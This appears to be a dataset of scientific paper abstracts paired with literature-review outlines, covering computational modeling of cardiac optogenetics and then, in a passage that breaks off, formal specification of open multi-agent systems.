Using optical action potential clamp, we experimentally validated model-predicted ChR2 behavior in guinea pig ventricular myocytes. The model was then incorporated in a variety of cardiac myocytes, including human ventricular, atrial and Purkinje cell models. We demonstrate the ability of ChR2 to trigger action potentials in human cardiomyocytes at relatively low light levels, as well as the differential response of these cells to light, with the Purkinje cells being most easily excitable and ventricular cells requiring the highest irradiance at all pulse durations.
This new experimentally-validated ChR2 model will facilitate virtual experimentation in neural and cardiac optogenetics at the cell and organ level and provide guidance for the development of in vivo tools. --- paper_title: Purkinje-mediated Effects in the Response of Quiescent Ventricles to Defibrillation Shocks paper_content: In normal cardiac function, orderly activation of the heart is facilitated by the Purkinje system (PS), a specialized network of fast-conducting fibers that lines the ventricles. Its role during ventricular defibrillation remains unelucidated. Physical characteristics of the PS make it a poor candidate for direct electrical observation using contemporary experimental techniques. This study uses a computer modeling approach to assess contributions by the PS to the response to electrical stimulation. Normal sinus rhythm was simulated and epicardial breakthrough sites were distributed in a manner consistent with experimental results. Defibrillation shocks of several strengths and orientations were applied to quiescent ventricles, with and without PS, and electrical activation was analyzed. All shocks induced local polarizations in PS branches parallel to the field, which led to the rapid spread of excitation through the network. This produced early activations at myocardial sites where tissue was unexcited by the shock and coupled to the PS. Shocks along the apico-basal axis of the heart resulted in a significant abbreviation of activation time when the PS was present; these shocks are of particular interest because the fields generated by internal cardioverter defibrillators tend to have a strong component in the same direction. The extent of PS-induced changes, both temporal and spatial, was constrained by the amount of shock-activated myocardium. Increasing field strength decreased the transmission delay between PS and ventricular tissue at Purkinje-myocardial junctions (PMJs), but this did not have a major effect on the organ-level response. Weaker shocks directly affect a smaller volume of myocardial tissue but easily excite the PS, which makes the PS contribution to far field excitation more substantial than for stronger shocks. --- paper_title: Multiscale Computational Models for Optogenetic Control of Cardiac Function paper_content: The ability to stimulate mammalian cells with light has significantly changed our understanding of electrically excitable tissues in health and disease, paving the way toward various novel therapeutic applications. Here, we demonstrate the potential of optogenetic control in cardiac cells using a hybrid experimental/computational technique. Experimentally, we introduced channelrhodopsin-2 into undifferentiated human embryonic stem cells via a lentiviral vector, and sorted and expanded the genetically engineered cells. Via directed differentiation, we created channelrhodopsin-expressing cardiomyocytes, which we subjected to optical stimulation. To quantify the impact of photostimulation, we assessed electrical, biochemical, and mechanical signals using patch-clamping, multielectrode array recordings, and video microscopy. Computationally, we introduced channelrhodopsin-2 into a classic autorhythmic cardiac cell model via an additional photocurrent governed by a light-sensitive gating variable. Upon optical stimulation, the channel opens and allows sodium ions to enter the cell, inducing a fast upstroke of the transmembrane potential. 
We calibrated the channelrhodopsin-expressing cell model using single action potential readings for different photostimulation amplitudes, pulse widths, and frequencies. To illustrate the potential of the proposed approach, we virtually injected channelrhodopsin-expressing cells into different locations of a human heart, and explored its activation sequences upon optical stimulation. Our experimentally calibrated computational toolbox allows us to virtually probe landscapes of process parameters, and identify optimal photostimulation sequences toward pacing hearts with light. --- paper_title: Methodology for patient-specific modeling of atrial fibrosis as a substrate for atrial fibrillation. paper_content: Personalized computational cardiac models are emerging as an important tool for studying cardiac arrhythmia mechanisms, and have the potential to become powerful instruments for guiding clinical anti-arrhythmia therapy. In this article, we present the methodology for constructing a patient-specific model of atrial fibrosis as a substrate for atrial fibrillation. The model is constructed from high-resolution late gadolinium-enhanced magnetic resonance imaging (LGE-MRI) images acquired in vivo from a patient suffering from persistent atrial fibrillation, accurately capturing both the patient's atrial geometry and the distribution of the fibrotic regions in the atria. Atrial fiber orientation is estimated using a novel image-based method, and fibrosis is represented in the patient-specific fibrotic regions as incorporating collagenous septa, gap junction remodeling, and myofibroblast proliferation. A proof-of-concept simulation result of reentrant circuits underlying atrial fibrillation in the model of the patient's fibrotic atrium is presented to demonstrate the completion of methodology development. --- paper_title: Mechanistic inquiry into the role of tissue remodeling in fibrotic lesions in human atrial fibrillation. paper_content: Atrial fibrillation (AF), the most common arrhythmia in humans, is initiated when triggered activity from the pulmonary veins propagates into atrial tissue and degrades into reentrant activity. Although experimental and clinical findings show a correlation between atrial fibrosis and AF, the causal relationship between the two remains elusive. This study used an array of 3D computational models with different representations of fibrosis based on a patient-specific atrial geometry with accurate fibrotic distribution to determine the mechanisms by which fibrosis underlies the degradation of a pulmonary vein ectopic beat into AF. Fibrotic lesions in models were represented with combinations of: gap junction remodeling; collagen deposition; and myofibroblast proliferation with electrotonic or paracrine effects on neighboring myocytes. The study found that the occurrence of gap junction remodeling and the subsequent conduction slowing in the fibrotic lesions was a necessary but not sufficient condition for AF development, whereas myofibroblast proliferation and the subsequent electrophysiological effect on neighboring myocytes within the fibrotic lesions was the sufficient condition necessary for reentry formation. Collagen did not alter the arrhythmogenic outcome resulting from the other fibrosis components. Reentrant circuits formed throughout the noncontiguous fibrotic lesions, without anchoring to a specific fibrotic lesion. 
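The channelrhodopsin entries above describe adding ChR2 to cardiomyocyte models "via an additional photocurrent governed by a light-sensitive gating variable". Below is a minimal sketch of that idea with a deliberately crude two-state gate; the parameter values (G_CHR2, E_CHR2, TAU_ON, TAU_OFF) and the pulse timing are assumptions for illustration, not constants from the cited models, which use multi-state, voltage- and irradiance-dependent kinetics.

# Minimal two-state ChR2-like photocurrent (illustrative, assumed parameter values).
G_CHR2 = 0.4      # maximal conductance, mS/cm^2 (assumed)
E_CHR2 = 0.0      # reversal potential, mV (non-selective cation channel, near 0 mV)
TAU_ON = 1.5      # opening time constant under illumination, ms (assumed)
TAU_OFF = 15.0    # closing time constant in darkness, ms (assumed)

def step_gate(o, light_on, dt):
    """Advance the light-gated variable o (0..1) by one explicit Euler step."""
    target, tau = (1.0, TAU_ON) if light_on else (0.0, TAU_OFF)
    return o + dt * (target - o) / tau

def i_chr2(o, v):
    """Photocurrent in uA/cm^2; inward (depolarizing) when v < E_CHR2."""
    return G_CHR2 * o * (v - E_CHR2)

dt, o, v = 0.01, 0.0, -80.0          # time step (ms), gate initially closed, resting potential (mV)
for n in range(int(30.0 / dt)):      # 30 ms of simulated time, light on for the first 10 ms
    t = n * dt
    o = step_gate(o, light_on=(t < 10.0), dt=dt)
print(round(o, 4), round(i_chr2(o, v), 3))   # gate decaying back after the pulse; photocurrent shrinking

In the organ-scale frameworks cited above, a term of this general form, with far more careful kinetics, is simply added to the total ionic current of every opsin-expressing cell.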
--- paper_title: ReaChR: a red-shifted variant of channelrhodopsin enables deep transcranial optogenetic excitation paper_content: Channelrhodopsins (ChRs) are used to optogenetically depolarize neurons. We engineered a variant of ChR, denoted red-activatable ChR (ReaChR), that is optimally excited with orange to red light (λ ∼590-630 nm) and offers improved membrane trafficking, higher photocurrents and faster kinetics compared to existing red-shifted ChRs. Red light is less scattered by tissue and is absorbed less by blood than the blue to green wavelengths that are required by other ChR variants. We used ReaChR expressed in the vibrissa motor cortex to drive spiking and vibrissa motion in awake mice when excited with red light through intact skull. Precise vibrissa movements were evoked by expressing ReaChR in the facial motor nucleus in the brainstem and illumination with red light through the external auditory canal. Thus, ReaChR enables transcranial optical activation of neurons in deep brain structures without the need to surgically thin the skull, form a transcranial window or implant optical fibers. --- paper_title: Optical mapping of optogenetically shaped cardiac action potentials paper_content: Light-mediated silencing and stimulation of cardiac excitability, an important complement to electrical stimulation, promises important discoveries and therapies. To date, cardiac optogenetics has been studied with patch-clamp, multielectrode arrays, video microscopy, and an all-optical system measuring calcium transients. The future lies in achieving simultaneous optical acquisition of excitability signals and optogenetic control, both with high spatio-temporal resolution. Here, we make progress by combining optical mapping of action potentials with concurrent activation of channelrhodopsin-2 (ChR2) or halorhodopsin (eNpHR3.0), via an all-optical system applied to monolayers of neonatal rat ventricular myocytes (NRVM). Additionally, we explore the capability of ChR2 and eNpHR3.0 to shape action-potential waveforms, potentially aiding the study of short/long QT syndromes that result from abnormal changes in action potential duration (APD). These results show the promise of an all-optical system to acquire action potentials with precise temporal optogenetics control, achieving a long-sought flexibility beyond the means of conventional electrical stimulation. --- paper_title: Independent optical excitation of distinct neural populations paper_content: Sequencing the transcriptomes of more than 100 species of alga yields new channelrhodopsins with promising properties for optogenetics. A far red–shifted channelrhodopsin, Chrimson, opens up new behavioral capabilities in Drosophila, and alongside a fast yet light-sensitive blue channelrhodopsin, Chronos, enables independent excitation of two neuronal populations in brain slices. --- paper_title: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation paper_content: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation --- paper_title: Cardiac optogenetics paper_content: Optogenetics is an emerging technology for optical interrogation and control of biological function with high specificity and high spatiotemporal resolution. Mammalian cells and tissues can be sensitized to respond to light by a relatively simple and well-tolerated genetic modification using microbial opsins (light-gated ion channels and pumps). 
These can achieve fast and specific excitatory or inhibitory response, offering distinct advantages over traditional pharmacological or electrical means of perturbation. Since the first demonstrations of utility in mammalian cells (neurons) in 2005, optogenetics has spurred immense research activity and has inspired numerous applications for dissection of neural circuitry and understanding of brain function in health and disease, applications ranging from in vitro to work in behaving animals. Only recently (since 2010), the field has extended to cardiac applications with less than a dozen publications to date. In consideration of the early phase of work on cardiac optogenetics and the impact of the technique in understanding another excitable tissue, the brain, this review is largely a perspective of possibilities in the heart. It covers the basic principles of operation of light-sensitive ion channels and pumps, the available tools and ongoing efforts in optimizing them, overview of neuroscience use, as well as cardiac-specific questions of implementation and ideas for best use of this emerging technology in the heart. --- paper_title: Computational Optogenetics: Empirically-Derived Voltage- and Light-Sensitive Channelrhodopsin-2 Model paper_content: Channelrhodospin-2 (ChR2), a light-sensitive ion channel, and its variants have emerged as new excitatory optogenetic tools not only in neuroscience, but also in other areas, including cardiac electrophysiology. An accurate quantitative model of ChR2 is necessary for in silico prediction of the response to optical stimulation in realistic tissue/organ settings. Such a model can guide the rational design of new ion channel functionality tailored to different cell types/tissues. Focusing on one of the most widely used ChR2 mutants (H134R) with enhanced current, we collected a comprehensive experimental data set of the response of this ion channel to different irradiances and voltages, and used these data to develop a model of ChR2 with empirically-derived voltage- and irradiance- dependence, where parameters were fine-tuned via simulated annealing optimization. This ChR2 model offers: 1) accurate inward rectification in the current-voltage response across irradiances; 2) empirically-derived voltage- and light-dependent kinetics (activation, deactivation and recovery from inactivation); and 3) accurate amplitude and morphology of the response across voltage and irradiance settings. Temperature-scaling factors (Q10) were derived and model kinetics was adjusted to physiological temperatures. Using optical action potential clamp, we experimentally validated model-predicted ChR2 behavior in guinea pig ventricular myocytes. The model was then incorporated in a variety of cardiac myocytes, including human ventricular, atrial and Purkinje cell models. We demonstrate the ability of ChR2 to trigger action potentials in human cardiomyocytes at relatively low light levels, as well as the differential response of these cells to light, with the Purkinje cells being most easily excitable and ventricular cells requiring the highest irradiance at all pulse durations. This new experimentally-validated ChR2 model will facilitate virtual experimentation in neural and cardiac optogenetics at the cell and organ level and provide guidance for the development of in vivo tools. --- paper_title: KCNJ2 mutation in short QT syndrome 3 results in atrial fibrillation and ventricular proarrhythmia. 
paper_content: We describe a mutation (E299V) in KCNJ2, the gene that encodes the strong inward rectifier K(+) channel protein (Kir2.1), in an 11-y-old boy. The unique short QT syndrome type-3 phenotype is associated with an extremely abbreviated QT interval (200 ms) on ECG and paroxysmal atrial fibrillation. Genetic screening identified an A896T substitution in a highly conserved region of KCNJ2 that resulted in a de novo mutation E299V. Whole-cell patch-clamp experiments showed that E299V presents an abnormally large outward IK1 at potentials above -55 mV (P < 0.001 versus wild type) due to a lack of inward rectification. Coexpression of wild-type and mutant channels to mimic the heterozygous condition still resulted in a large outward current. Coimmunoprecipitation and kinetic analysis showed that E299V and wild-type isoforms may heteromerize and that their interaction impairs function. The homomeric assembly of E299V mutant proteins actually results in gain of function. Computer simulations of ventricular excitation and propagation using both the homozygous and heterozygous conditions at three different levels of integration (single cell, 2D, and 3D) accurately reproduced the electrocardiographic phenotype of the proband, including an exceedingly short QT interval with merging of the QRS and the T wave, absence of ST segment, and peaked T waves. Numerical experiments predict that, in addition to the short QT interval, absence of inward rectification in the E299V mutation should result in atrial fibrillation. In addition, as predicted by simulations using a geometrically accurate three-dimensional ventricular model that included the His-Purkinje network, a slight reduction in ventricular excitability via 20% reduction of the sodium current should increase vulnerability to life-threatening ventricular tachyarrhythmia. --- paper_title: Optogenetics-enabled dynamic modulation of action potential duration in atrial tissue: feasibility of a novel therapeutic approach. paper_content: AIMS: Diseases that abbreviate the cardiac action potential (AP) by increasing the strength of repolarizing transmembrane currents are highly arrhythmogenic. It has been proposed that optogenetic tools could be used to restore normal AP duration (APD) in the heart under such disease conditions. This study aims to evaluate the efficacy of an optogenetic treatment modality for prolonging pathologically shortened APs in a detailed computational model of short QT syndrome (SQTS) in the human atria, and compare it to drug treatment. METHODS AND RESULTS: We used a human atrial myocyte model with faster repolarization caused by SQTS; light sensitivity was inscribed via the presence of channelrhodopsin-2 (ChR2). We conducted simulations in single cells and in a magnetic resonance imaging-based model of the human left atrium (LA). Application of an appropriate optical stimulus to a diseased cell dynamically increased APD, producing an excellent match to control AP (<1.5 mV deviation); treatment of a diseased cell with an AP-prolonging drug (chloroquine) also increased APD, but the match to control AP was worse (>5 mV deviation). Under idealized conditions in the LA (uniform ChR2-expressing cell distribution, no light attenuation), optogenetics-based therapy outperformed chloroquine treatment (APD increased to 87% and 81% of control).
However, when non-uniform ChR2-expressing cell distribution and light attenuation were incorporated, optogenetics-based treatment was less effective (APD only increased to 55%). CONCLUSION: This study demonstrates proof of concept for optogenetics-based treatment of diseases that alter atrial AP shape. We identified key practical obstacles intrinsic to the optogenetic approach that must be overcome before such treatments can be realized. ---
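Several of the preceding entries treat light delivery as the limiting practical factor: the Monte Carlo optical-mapping study measures absorption and scattering coefficients, and the atrial APD-modulation study finds that light attenuation sharply reduces efficacy. A rough, standard way to quantify this is the diffusion-approximation penetration depth computed from those coefficients. The sketch below uses illustrative values, which are assumptions rather than the measurements reported in the cited papers.

import math

# Illustrative tissue optical properties for blue (~470 nm) light; all values assumed.
mu_a = 0.5        # absorption coefficient, 1/mm (assumed)
mu_s = 20.0       # scattering coefficient, 1/mm (assumed)
g = 0.85          # scattering anisotropy (assumed)

mu_s_prime = mu_s * (1.0 - g)                            # reduced scattering coefficient
mu_eff = math.sqrt(3.0 * mu_a * (mu_a + mu_s_prime))     # effective attenuation (diffusion approximation)
delta = 1.0 / mu_eff                                     # penetration depth, mm

for z in (0.5, 1.0, 2.0):                                # depth below the illuminated surface, mm
    frac = math.exp(-z / delta)                          # simple exponential fall-off of irradiance
    print(f"depth {z:.1f} mm: {100.0 * frac:.1f}% of surface irradiance")

Estimates of this kind help explain the interest, visible in the ReaChR entry above, in red-shifted opsins: red light is scattered and absorbed less than blue light and so reaches deeper tissue.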
Title: Computational modeling of cardiac optogenetics: Methodology overview & review of findings from simulations
Section 1: Introduction
Description 1: Introduce the field of cardiac optogenetics, discuss the potential of low-energy light for electrophysiological control, and outline the aim of the review.
Section 2: Modeling cardiac optogenetics at the protein scale
Description 2: Discuss the steps towards multiscale simulation at the protein level, focusing on the electrophysiological behavior of opsins, especially channelrhodopsin-2 (ChR2).
Section 3: Modeling cardiac optogenetics at the myocyte scale
Description 3: Describe modeling efforts at the myocyte level, including direct expression of opsins in cardiac myocytes and electrical coupling of opsin-rich donor cells to myocytes.
Section 4: Modeling cardiac optogenetics at the tissue scale
Description 4: Explain the incorporation of realistic spatial patterns of opsin-expressing cells at the tissue level, highlighting the significance of heterogeneous patterns.
Section 5: Modeling cardiac optogenetics at the organ scale
Description 5: Outline the steps needed to simulate the dynamics of excitation and contraction in biophysically-detailed models of the heart, including representation of optical stimuli and light-tissue interactions.
Section 6: Effects of cardiac cell type on energy required for optogenetics-based stimulation
Description 6: Discuss how different cardiac cell types impact the energy required for optical stimulation, considering variations in action potential properties and membrane currents.
Section 7: Optogenetics-based cardiac pacing
Description 7: Investigate factors influencing optogenetics-based cardiac pacing, including multicellular and coupling effects, optical irradiance thresholds, and spatial distribution of light-sensitive cells.
Section 8: Dynamic modulation of atrial action potential duration (APD)
Description 8: Explore the potential of optogenetics to modulate action potential duration, highlighting potential therapeutic applications and limitations observed in simulations.
Section 9: Conclusions
Description 9: Summarize the main findings of cardiac optogenetics modeling, stressing its potential to advance light-based therapies and guide the development of new optogenetic tools for cardiac applications.
Section 10: Conflicts of interest statements
Description 10: Declare any potential conflicts of interest the authors may have regarding the work presented in the review.
Specifying open agent systems: A survey
10
--- paper_title: Open Multi-Agent Systems: Agent Communication and Integration paper_content: In this paper, we study the open-ended nature of multi-agent systems, which refers to the property of allowing the dynamic integration of new agents into an existing system. In particular, the focus of this study is on the issues of agent communication and integration. We define an abstract programming language for open multi-agent systems that is based on concepts and mechanisms as introduced and studied in concurrency theory. Moreover, an important ingredient is the generalisation of the traditional concept of value-passing to a communication mechanism that allows for the exchange of information. Additionally, an operational model for the language is given in terms of a transition system, which allows the formal derivation of computations. --- paper_title: A formal road from institutional norms to organizational structures paper_content: Up to now, the way institutions and organizations have been used in the development of open systems has not often gone further than a useful heuristics. In order to develop systems actually implementing institutions and organizations, formal methods should take the place of heuristic ones. The paper presents a formal semantics for the notion of institution and its components (abstract and concrete norms, empowerment of agents, roles) and defines a formal relation between institutions and organizational structures. As a result, it is shown how institutional norms can be refined to constructs---organizational structures---which are closer to an implemented system. It is also shown how such a refinement process can be fully formalized and it is therefore amenable to rigorous verification. --- paper_title: New Developments in Ontology-Based Policy Management: Increasing the Practicality and Comprehensiveness of KAoS paper_content: The KAoS policy management framework pioneered the use of semantically-rich ontological representation and reasoning to specify, analyze, deconflict, and enforce policies [9, 10]. The framework has continued to evolve over the last five years, inspired by both technological advances and the practical needs of its varied applications. In this paper, we describe how these applications have motivated the partitioning of components into a well-defined three-layer policy management architecture that hides ontology complexity from the human user and from the policy-governed system. The power of semantic reasoning is embedded in the middle layer of the architecture where it can provide the most benefit. We also describe how the policy semantics of the core KAoS policy ontology has grown in its comprehensiveness. The flexible and mature architecture of KAoS enables straightforward integration with a variety of deployment platforms, ranging from highly distributed systems, such as the AFRL information management system, to human-robotic interaction, to dynamic management of quality-of-service and cross-domain information management of wireless networks in resource-constrained or security-sensitive environments. --- paper_title: Amongst first-class protocols paper_content: The ubiquity of our increasingly distributed and complex computing environments have necessitated the development of programming approaches and paradigms that can automatically manage the numerous tasks and processes involved. Hence, research into agency and multi-agent systems are of more and more interest as an automation solution. 
Coordination becomes a central issue in these environments. The most promising approach is the use of interaction protocols. Interaction protocols specify the interaction or social norms for the participating agents. However the orthodoxy see protocols as rigid specifications that are defined a priori. A recent development in this field of research is the specification of protocols that are treated as first-class computational entities. This paper explores the most prominent approaches and compares them. --- paper_title: Open information systems semantics for distributed artificial intelligence paper_content: Abstract Distributed Artificial Intelligence (henceforth called DAI) deals with issues of large-scale Open Systems (i.e. systems which are always subject to unanticipated outcomes in their operation and which can receive new information from outside themselves at any time). Open Information Systems (henceforth called OIS) are Open Systems that are implemented using digital storage, operations, and communications technology. OIS Semantics aims to provide a scientific foundation for understanding such large-scale OIS projects and for developing new technology. The literature of DAI speaks of many important concepts such as commitment, conflict, negotiation, cooperation, distributed problem solving, representation , etc. However there is currently no framework for comparing the usage of such concepts in one publication with usage in other publications. Open Information System Semantics (henceforth called OIS Semantics) is a step toward remedying this problem by providing a framework which integrates methods from Sociology with methods from Concurrent Systems Science into a foundation that provides a framework for analyzing previous work in DAI and a powerful foundation for its further development. Deduction, one of the most powerful and well-understood methods for information systems, has recently been applied to foundational issues in DAI thereby raising important new issues and problems above and beyond those of applying deduction to the problems of classical AI. OIS Semantics provides answers to many important questions about the uses of deduction in OIS. It provides a characterization of Deduction that encompasses N th-Order Logics, Meta-theories, Modal Logics, Circumscription, Default Logic, Autoepistemic Logic, Restricted Scope Nonmonotonic Logics, etc. OIS Semantics develops the concept of Deductive Indecision as a fundamental aspect of Deductive systems, thereby characterizing the scope and limits of Deduction for operational and representational activities in OIS. Negotiations play a fundamental role in OIS Semantics. They are creative processes that go beyond the capabilities of Deduction. OIS Semantics characterizes the role of Negotiation as a powerful method for increasing understanding of large-scale OIS projects. The ambitious goal of OIS Semantics for DAI is to provide an integrated foundation for Sociology and Concurrent Systems Science. This paper provides a snapshot of where we currently stand in the process of developing these foundations --- paper_title: Agent communication languages: rethinking the principles paper_content: Agent communication languages have been used for years in proprietary multiagent systems. Yet agents from different vendors-or even different research projects-cannot communicate with each other. The author looks at the underlying reasons and proposes a conceptual shift from individual agent representations to social interaction. 
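The "Amongst first-class protocols" entry above contrasts rigid, a-priori protocol definitions with protocols treated as first-class computational entities. A toy sketch of the latter view: the protocol is an ordinary runtime object that participants can query for legal next moves and use to check a message trace. The purchase-style states and messages below are invented for illustration and are not taken from any of the cited papers.

from dataclasses import dataclass, field

@dataclass
class Protocol:
    """A protocol as a first-class object: data an agent can inspect, check against, or compose."""
    start: str
    transitions: dict = field(default_factory=dict)   # (state, role, message) -> next state

    def allowed(self, state):
        """Which (role, message) pairs may legally occur next from the given state."""
        return [(role, msg) for (s, role, msg) in self.transitions if s == state]

    def compliant(self, trace):
        """Does a sequence of (role, message) pairs follow the protocol so far?"""
        state = self.start
        for role, msg in trace:
            if (state, role, msg) not in self.transitions:
                return False
            state = self.transitions[(state, role, msg)]
        return True

purchase = Protocol(start="open", transitions={
    ("open", "customer", "request_quote"): "requested",
    ("requested", "merchant", "quote"): "quoted",
    ("quoted", "customer", "accept"): "accepted",
    ("accepted", "merchant", "deliver"): "delivered",
    ("delivered", "customer", "pay"): "done",
})

print(purchase.allowed("quoted"))                                  # [('customer', 'accept')]
print(purchase.compliant([("customer", "request_quote"),
                          ("merchant", "quote")]))                 # True

Because the specification is data rather than logic baked into each agent, it can be shared, inspected and composed at run time, which is the property the commitment-protocol and protocol-composition entries later in this list build on.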
--- paper_title: The Deontic Component of Action Language n C+ paper_content: The action language ${\mathcal{C}}+$ of Giunchiglia, Lee, Lifschitz, McCain, and Turner is a formalism for specifying and reasoning about the effects of actions and the persistence (‘inertia') of facts over time. An ‘action description' in ${\mathcal{C}}+$ defines a labelled transition system of a certain kind. $n{\mathcal{C}}+$ (formerly known as $({\mathcal{C}}+)^{++}$) is an extended form of ${\mathcal{C}}+$ designed for representing normative and institutional aspects of (human or computer) societies. The deontic component of $n{\mathcal{C}}+$ provides a means of specifying the permitted (acceptable, legal) states of a transition system and its permitted (acceptable, legal) transitions. We present this component of $n{\mathcal{C}}+$, motivating its details with reference to some small illustrative examples. --- paper_title: Modeling communicative behavior using permissions and obligations paper_content: In order to provide flexible control over agent communication, we propose an integrated approach that involves using positive and negative permissions and obligations to describe both conversation specifications and policies. Conversation specifications are described in terms of the speech acts that an agent can/cannot/must/must not perform based on the sequence of messages received and sent. On the other hand, conversation policies restrict how the specifications are used and are defined over the attributes of the sender, receiver, message content, and context in general. Other policies like management, social, privacy etc. are defined at a higher level of abstraction and restrict the general behavior of agents. Whenever they deal with communication, the higher level policies are translated into conversation policies using the syntax and semantics of the specific communication language being used. Agents use a policy engine for reasoning over conversation specifications and applicable policies in order to decide what communicative act to perform next. Our work is different from existing research in communication policies because it is not tightly coupled to any domain information such as mental states of agents or specific communicative acts.The main contributions of this work include (i) an extensible framework that can support varied domain knowledge and different agent communication languages, and (ii) the declarative representation of conversation specifications and policies in terms of permitted and obligated speech acts. --- paper_title: Role-assignment in open agent societies paper_content: Open systems are characterized by heterogeneous participants which can enter or leave the system at will. Typical examples are e-commerce applications or information agent systems. Agents (e.g. personal assistants for buying things on the Internet) will only temporarily take up roles (e.g. a buyer in on-line auctions). This creates the need to define precisely what it means that an agent "takes up" a role and "enacts" it. In this paper we present ongoing research on the determination of the conditions under which an agent can enact a role and what it means for the agent to enact a role. We define possible relations between roles and agents and discuss architectural and functional changes that an agent must undergo when it enters an open agent system. 
--- paper_title: ORGANISATIONAL RULES AS AN ABSTRACTION FOR THE ANALYSIS AND DESIGN OF MULTI-AGENT SYSTEMS paper_content: Multi-agent systems can very naturally be viewed as computational organisations. For this reason, we believe organisational abstractions offer a promising set of metaphors and models that can be exploited in the analysis and design of such systems. To this end, the concept of role models is increasingly being used to specify and design multi-agent systems. However, this is not the full picture. In this paper we introduce three additional organisational concepts - organisational rules , organisational structures, and organisational patterns - and discuss why we believe they are necessary for the complete specification of computational organisations. In particular, we focus on the concept of organisational rules and introduce a formalism, based on temporal logic, to specify them. This formalism is then used to drive the definition of the organisational structure and the identification of the organisational patterns. Finally, the paper sketches some guidelines for a methodology for agent-oriented systems based on our expanded set of organisational abstractions. --- paper_title: Rules of encounter: designing conventions for automated negotiation among computers paper_content: Part 1 Machines that make deals: the premise machine encounters social engineering for machines scenarios how does this differ from Al? how does this differ from game theory? Part 2 Interaction mechanisms: the negotiation problem in different domains attributes of negotiation mechanisms assumptions incentive compatibility. Part 3 Task-oriented domains: domain definition attributes and examples a negotiation mechanism evaluation of the negotiation mechanism an alternative, one-step protocol mechanisms that maximize the product of utilities the bottom line. Part 4 Deception-free protocols: non-manipulable negotiation mechanisms probabilistic deals subadditive domains concave domains modular domains summary of incentive compatible mechanisms the bottom line. Part 5 State-oriented domains: side-effects in encounters domain definition attributes and examples a negotiation mechanism worth of a goal conflict resolution semi-co-operative deals in non-conflict situations unified negotiation protocols (UNP) multi-plan deals the hierarchy of deal types - summary unbounded worth of a goal - tidy agents the bottom line. Part 6 Strategic manipulation: negotiation with incomplete information incomplete information about worth of goals using the revelation principle to re-design the mechanisms the bottom line. Part 7 Worth-oriented domains: goal relaxation domain definition one agent best plan negotiation over sub-optimal states examples of worth functions the bottom line. Appendices: strict/tolerant mechanisms some related work proofs. --- paper_title: The ontological properties of social roles in multi-agent systems: definitional dependence, powers and roles playing roles paper_content: In this paper we address the problem of defining social roles in multi-agent systems. Social roles provide the basic structure of social institutions and organizations. We start from the properties attributed to roles both in the multi-agent systems and the Object Oriented community, and we use them in an ontological analysis of the notion of social role. We identify three main properties of social roles. First, they are definitionally dependent on the institution they belong to, i.e. 
the definition of a role is given inside the definition of the institution. Second, they attribute powers to the agents playing them, like creating commitments for the institutions and the other roles. Third, they allow roles to play roles, in the same way as agents do. Using Input/Output logics, we propose a formalization of roles in multi-agent systems satisfying the three properties we identified. --- paper_title: Security policies for sharing knowledge in virtual communities paper_content: Knowledge management exploits the new opportunities of sharing knowledge among members of virtual communities in distributed computer networks, and knowledge-management systems are therefore modeled and designed as multiagent systems. In this paper, normative multiagent systems for secure knowledge management based on access-control policies are studied. It is shown how distributed access control is realized by means of local policies of access-control systems for documents of knowledge providers, and by means of global community policies regulating these local policies. Moreover, it is shown how such a virtual community of multiple knowledge providers respects the autonomy of the knowledge providers --- paper_title: Law-governed interaction: a coordination and control mechanism for heterogeneous distributed systems paper_content: Software technology is undergoing a transition form monolithic systems, constructed according to a single overall design, into conglomerates of semiautonomous, heterogeneous, and independently designed subsystems, constructed and managed by different organizations, with little, if any, knowledge of each other. Among the problems inherent in such conglomerates, none is more serious than the difficulty to control the activities of the disparate agents operating in it, and the difficulty for such agents to coordinate their activities with each other. We argue that the nature of coordination and control required for such systems calls for the following principles to be satisfied: (1) coordination policies need to be enforced: (2) the enforcement needs to be decentralized; and (3) coordination policies need to be formulated explicitly—rather than being implicit in the code of the agents involved—and they should be enforced by means of a generic, broad spectrum mechanism; and (4) it should be possible to deploy and enforce a policy incrementally, without exacting any cost from agents and activities not subject to it. We describe a mechansim called law-governed interaction (LGI), currently implemented by the Moses toolkit, which has been designed to satisfy these principles. We show that LGI is at least as general as a conventional centralized coordination mechanism (CCM), and that it is more scalable, and generally more efficient, then CCM. --- paper_title: A Social Semantics for Agent Communication Languages paper_content: The ability to communicate is one of the salient properties of agents. Although a number of agent communication languages (ACLs) have been developed, obtaining a suitable formal semantics for ACLs remains one of the greatest challenges of multiagent systems theory. Previous semantics have largely been mentalistic in their orientation and are based solely on the beliefs and intentions of the participating agents. Such semantics are not suitable for most multiagent applications, which involve autonomous and heterogeneous agents, whose beliefs and intentions cannot be uniformly determined. 
Accordingly, we present a social semantics for ACLs that gives primacy to the interactions among the agents. Our semantics is based on social commitments and is developed in temporal logic. This semantics, because of its public orientation, is essential to providing a rigorous basis for multiagent protocols. --- paper_title: On Computational Social Laws for Dynamic Non-Homogeneous Social Structures paper_content: Abstract Approaches to the coordination of artificial agents may be inspired by observations on human and other natural societies. On the other hand, the introduction and the analysis of general computational models and mechanisms of coordination may shed light on the general theory of coordination. This paper extends a fundamental approach to the coordination of artificial agent societies, the artificial social systems approach, in order to incorporate several features observed in human societies. As a result, the approach becomes more powerful, and illuminating computational results are obtained. An artificial social system is a basic mechanism of coordination. It decreases the need for both centralized control and on-line resolution of conflicts by introducing a set of social laws that enable agents to work individually in a mutually compatible manner. This work extends the existing work on artificial social systems in a variety of directions, (a) We present a model that refers explicitly to social law... --- paper_title: Minimal social laws paper_content: Research on social laws in computational environments has proved the usefulness of the law-based approach for the coordination of multi-agent systems. Though researchers have noted that the imposition of a specification could be attained by a variety of different laws, there has been no attempt to identify a criterion for selection among alternative useful social laws. We propose such a criterion which is based on the notion of minimality. A useful social law puts constraints on the agents' actions in such a way that as a result of these constraints, they are able to achieve their goals. A minimal social law is a useful social law that minimizes the amount of constraints the agents shall obey. Minimal social laws give an agent maximal flexibility in choosing a new behavior as a function of various local changes either in his capabilities or in his objectives, without interfering with the other agents. We show that this concept can be usefully applied to a problem in robotics and present a computational study of minimal social laws. --- paper_title: On the synthesis of useful social laws for artificial agent societies paper_content: We present a general model of social law in a computational system, and investigate some of its properties. The contribution of this paper is twofold. First, we argue that the notion of social law is not epiphenomenal, but rather should be built into the action representation; we then offer such a representation. Second, we investigate the complexity of automatically deriving useful social laws in this model, given descriptions of the agents' capabilities, and the goals they might encounter. We show that in general the problem is NP-complete, and identify precise conditions under which it becomes polynomial. --- paper_title: Choosing Social Laws for Multi-Agent Systems: Minimality and Simplicity paper_content: Abstract The design of social laws for artificial agent societies is a 